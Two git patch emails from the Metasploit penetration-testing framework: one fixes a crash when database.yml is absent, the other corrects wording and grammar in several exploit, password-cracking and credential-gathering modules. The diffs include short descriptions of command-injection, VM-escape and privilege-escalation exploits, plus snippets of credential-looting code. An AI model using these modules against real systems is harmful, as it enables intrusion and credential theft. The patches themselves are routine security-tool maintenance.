Date: Mon, 18 Aug 2014 12:40:57 -0500
Subject: [PATCH 320/321] Fix crash when database.yml doesn't exist

---
 lib/metasploit/framework/require.rb | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/lib/metasploit/framework/require.rb b/lib/metasploit/framework/require.rb
index c493c834e6..760771c488 100644
--- a/lib/metasploit/framework/require.rb
+++ b/lib/metasploit/framework/require.rb
@@ -49,10 +49,14 @@ module Metasploit
       #
       # @return [void]
       def self.optionally_active_record_railtie
-        optionally(
+        if ::File.exist?(Rails.application.config.paths['config/database'].first)
+          optionally(
             'active_record/railtie',
             'activerecord not in the bundle, so database support will be disabled.'
-        )
+          )
+        else
+          warn 'Could not find database.yml, so database support will be disabled.'
+        end
       end
 
       # Tries to `require 'metasploit/credential/creation'` and include it in the `including_module`.
@@ -89,4 +93,4 @@ module Metasploit
       end
     end
   end
-end
\ No newline at end of file
+end

From cad281494f688151db8dc2fb30ee8d8c212acd3b Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 18 Aug 2014 13:35:34 -0500
Subject: [PATCH 321/321] Minor caps, grammar, desc fixes

---
 modules/auxiliary/analyze/jtr_postgres_fast.rb       |  4 ++--
 modules/exploits/multi/http/gitlab_shell_exec.rb     |  2 +-
 .../unix/http/vmturbo_vmtadmin_exec_noauth.rb        | 12 +++++++++++-
 modules/exploits/windows/local/mqac_write.rb         |  2 +-
 .../windows/local/virtual_box_opengl_escape.rb       |  2 +-
 modules/post/linux/gather/gnome_commander_creds.rb   |  2 +-
 6 files changed, 17 insertions(+), 7 deletions(-)

diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb
index 9b7403422c..23b674a226 100644
--- a/modules/auxiliary/analyze/jtr_postgres_fast.rb
+++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
         print_status line.chomp
       end
 
-      print_status "Cracked Passwords this run:"
+      print_status "Cracked passwords this run:"
       cracker_instance.each_cracked_password do |password_line|
         password_line.chomp!
         next if password_line.blank?
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
       end
     end
     hashlist.close
-    print_status "Hashes Written out to #{hashlist.path}"
+    print_status "Hashes written out to #{hashlist.path}"
     hashlist.path
   end
 
diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb
index 9d4dad3046..17a87b991b 100644
--- a/modules/exploits/multi/http/gitlab_shell_exec.rb
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ssh keys in the gitlab-shell functionality of Gitlab. Versions
         of gitlab-shell prior to 1.7.4 used the ssh key provided directly
         in a system call resulting in a command injection vulnerability. As
-        this relies on adding an ssh key to an account valid credentials
+        this relies on adding an ssh key to an account, valid credentials
         are required to exploit this vulnerability.
       ),
       'Author'  =>
diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 8441d959fd..ab9a2e38bb 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution',
+      'Name'        => 'VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution',
       'Description' => %q{
           VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated
           OS Command injection in the web interface. Use reverse payloads for the most
@@ -93,6 +93,16 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Unknown
     end
 
+    # NOTE (@todb): This PHP style comparison seems incorrect, since
+    # strings are being compared and not numbers. Example:
+    # 1.9.3p547 :001 > a = "4.6"
+    #  => "4.6"
+    # 1.9.3p547 :002 > b = "10.6"
+    #  => "10.6"
+    # 1.9.3p547 :003 > a <= b
+    #
+    # Also, the description says 4.5 is also vuln. This doesn't
+    # appear to care.
     if version and version <= "4.6" and build < "28657"
       return Exploit::CheckCode::Appears
     else
diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index 68f01e41f2..597f7e0123 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -160,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Local
     session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
     unless is_system?
-      print_error('Exploit failed')
+      print_error('Did not get system, exploit failed')
       return
     end
 
diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
index b839049eda..c3bd6a2131 100644
--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Local
       'Description'    => %q{
         This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The
         vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a
-        sequence of specially crafted of rendering messages, a virtual machine can exploit an out
+        sequence of specially crafted rendering messages, a virtual machine can exploit an out
         of bounds array access to corrupt memory and escape to the host. This module has been
         tested successfully on Windows 7 SP1 (64 bits) as Host running  Virtual Box 4.3.6.
       },
diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 1739a15fb6..824beb4a62 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
           vprint_line(str_file)
           #Store file
           p = store_loot("connections", "text/plain", session, str_file, connections_file, "Gnome-Commander connections")
-          print_good ("Connections file saved to #{p}")
+          print_good("Connections file saved to #{p}")
         rescue EOFError
           # If there's nothing in the file, we hit EOFError
           print_error("Nothing read from file: #{connections_file}, file may be empty")